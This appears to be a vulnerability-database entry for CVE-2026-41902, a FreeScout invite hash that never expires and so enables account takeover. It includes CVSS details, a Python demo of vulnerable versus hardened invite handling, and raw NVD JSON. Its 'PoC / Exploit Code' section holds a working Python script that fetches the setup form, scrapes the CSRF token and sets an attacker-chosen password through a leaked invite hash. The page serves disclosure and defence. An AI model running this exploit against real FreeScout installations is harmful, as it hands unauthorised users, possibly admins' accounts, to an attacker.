Security Vulnerability Report
CVE-2026-41902 CVSS 9.1 CRITICAL

CVE-2026-41902

Published: 2026-05-07 19:16:01
Last Modified: 2026-05-08 22:16:31

Description

FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, the /user-setup/{hash} endpoint accepts a 60-character random invite_hash to set a new user's password. The endpoint performs no expiration check: the hash remains valid indefinitely until it is consumed (CWE-613, Insufficient Session Expiration). Combined with realistic hash-leakage scenarios (forwarded invite emails, the Referer header sent to external CDNs loaded by the setup page, server-side log exposure, abandoned invite emails in shared inboxes), this enables unauthenticated, permanent account takeover months or years after the invite was issued. If the leaked invite was sent to an admin, the takeover yields admin access. This issue has been patched in version 1.8.217. Because the attack surface is every invite that was issued but never completed, operators should also audit and re-issue outstanding, unconsumed invites rather than rely on the upgrade alone.
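The lifecycle behind this finding, as an added example that is not FreeScout's code: an in-memory stand-in for the users table (field names, the 7-day TTL and the digest scheme are assumptions) with the unexpiring lookup the advisory describes beside a hardened version that records when the invite was issued, rejects it after a TTL, stores only a digest so a database or log leak does not yield a usable hash, compares in constant time, and consumes the invite on first use.

```python
import hashlib
import hmac
import secrets
import time

# Assumed policy for the hardened store: an invite dies after 7 days.
INVITE_TTL_SECONDS = 7 * 24 * 3600
# The advisory says invite_hash is a 60-character random string.
HASH_LEN = 60
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def new_invite_hash() -> str:
    """Random invite hash with the same shape as the one mailed to the invited user."""
    return "".join(secrets.choice(ALPHABET) for _ in range(HASH_LEN))


def digest(invite_hash: str) -> str:
    """What the hardened store keeps: a SHA-256 of the hash, never the hash itself."""
    return hashlib.sha256(invite_hash.encode()).hexdigest()


class VulnerableUserStore:
    """Mirrors the pre-1.8.217 behaviour described in the advisory: the raw hash sits
    on the user row and /user-setup/{hash} matches it with no time check at all."""

    def __init__(self):
        self.users = {}  # user_id -> {"invite_hash": str|None, "password": str|None}

    def invite(self, user_id, now=None):
        h = new_invite_hash()
        self.users[user_id] = {"invite_hash": h, "password": None}
        return h

    def user_setup(self, invite_hash, new_password, now=None):
        for uid, row in self.users.items():
            if row["invite_hash"] is not None and row["invite_hash"] == invite_hash:
                row["password"] = new_password
                row["invite_hash"] = None  # consumed only now, however old it is
                return uid
        return None


class HardenedUserStore:
    """Adds an issue timestamp, a TTL, digest-only storage and a constant-time compare."""

    def __init__(self, ttl=INVITE_TTL_SECONDS):
        self.ttl = ttl
        self.users = {}  # user_id -> {"invite_digest", "invite_created_at", "password"}

    def invite(self, user_id, now=None):
        now = time.time() if now is None else now
        h = new_invite_hash()
        self.users[user_id] = {"invite_digest": digest(h), "invite_created_at": now, "password": None}
        return h  # the raw hash goes only into the invite email

    def user_setup(self, invite_hash, new_password, now=None):
        now = time.time() if now is None else now
        candidate = digest(invite_hash)
        for uid, row in self.users.items():
            stored = row["invite_digest"]
            if stored is None or not hmac.compare_digest(stored, candidate):
                continue
            if now - row["invite_created_at"] > self.ttl:
                return None  # expired: a hash leaked months later buys nothing
            row["password"] = new_password
            row["invite_digest"] = None  # single use
            row["invite_created_at"] = None
            return uid
        return None


def demo():
    """Replay the advisory's scenario against both stores with a fixed clock."""
    issued = 1_700_000_000
    one_year = 365 * 24 * 3600

    vuln = VulnerableUserStore()
    leaked = vuln.invite("admin", now=issued)
    vuln_takeover = vuln.user_setup(leaked, "attacker-pw", now=issued + one_year)

    hard = HardenedUserStore()
    leaked2 = hard.invite("admin", now=issued)
    hard_stale = hard.user_setup(leaked2, "attacker-pw", now=issued + one_year)
    hard_fresh = hard.user_setup(leaked2, "legit-pw", now=issued + 3600)
    hard_replay = hard.user_setup(leaked2, "attacker-pw", now=issued + 7200)
    return vuln_takeover, hard_stale, hard_fresh, hard_replay


if __name__ == "__main__":
    print(demo())  # ('admin', None, 'admin', None)
```

The vulnerable store hands over the admin account a year after the invite went out; the hardened store refuses the stale hash, accepts it inside the window, and refuses the replay once it has been consumed. Storing only the digest is what makes the log-exposure and database-leak scenarios in the description harmless even before the TTL runs out.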

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
(Network-reachable, low attack complexity, no privileges and no user interaction required; high confidentiality and integrity impact, no availability impact. Exploitability subscore 3.9, impact subscore 5.2.)
Weakness
CWE-613 (Insufficient Session Expiration)

Configurations (Affected Products)

No CPE configuration data is available in the NVD record; the affected range below is taken from the advisory.

FreeScout < 1.8.217 (fixed in 1.8.217)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import re
import sys

import requests

# Target configuration
target_host = "http://example.com"
# Placeholder only: a real FreeScout invite_hash is a 60-character random string
leaked_invite_hash = "0123456789" * 6

# The vulnerable endpoint: before 1.8.217 it accepts the invite hash with no expiry check
url = f"{target_host}/user-setup/{leaked_invite_hash}"

# New password payload
payload = {
    "password": "HackedPassword123!",
    "password_confirmation": "HackedPassword123!",
}

session = requests.Session()
try:
    # Load the setup form first: a Laravel app's default VerifyCsrfToken middleware
    # expects the session cookie plus the hidden _token field from this page.
    setup_page = session.get(url, timeout=15)
    if setup_page.status_code != 200:
        print(f"[-] Setup page returned {setup_page.status_code}; hash may be invalid or already consumed")
        sys.exit(1)
    token = re.search(r'name="_token"[^>]*value="([^"]+)"', setup_page.text)
    if token:
        payload["_token"] = token.group(1)

    # Submit the new password without following redirects so the raw status is visible
    response = session.post(url, data=payload, allow_redirects=False, timeout=15)
    if response.status_code in (301, 302, 303):
        print("[+] Redirect received; password was likely set. Location: " + response.headers.get("Location", ""))
    elif response.status_code == 200:
        # The form was re-rendered, which usually means validation errors (e.g. other required fields)
        print("[?] Status 200: form re-rendered, inspect the response for validation errors.")
        print(f"[?] Response: {response.text[:500]}")
    else:
        print(f"[-] Failed with status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[!] Error: {e}")
```

References

https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 (fixed release)
https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-hqff-cwx7-3jpm (GitHub Security Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41902",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T19:16:00.807",
    "lastModified": "2026-05-08T22:16:30.810",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, the /user-setup/{hash} endpoint accepts a 60-character random invite_hash to set a new user's password. The endpoint performs no expiration check — the hash remains valid indefinitely until consumed. Combined with realistic hash-leakage scenarios (forwarded invite emails, HTTP referrer to external CDNs on the setup page, server-side log exposure, abandoned invite emails in shared inboxes), this enables unauthenticated permanent account takeover months or years after invite issuance. If the leaked invite was sent to an admin, the takeover yields admin access. This issue has been patched in version 1.8.217."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-613"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-hqff-cwx7-3jpm",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-hqff-cwx7-3jpm",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```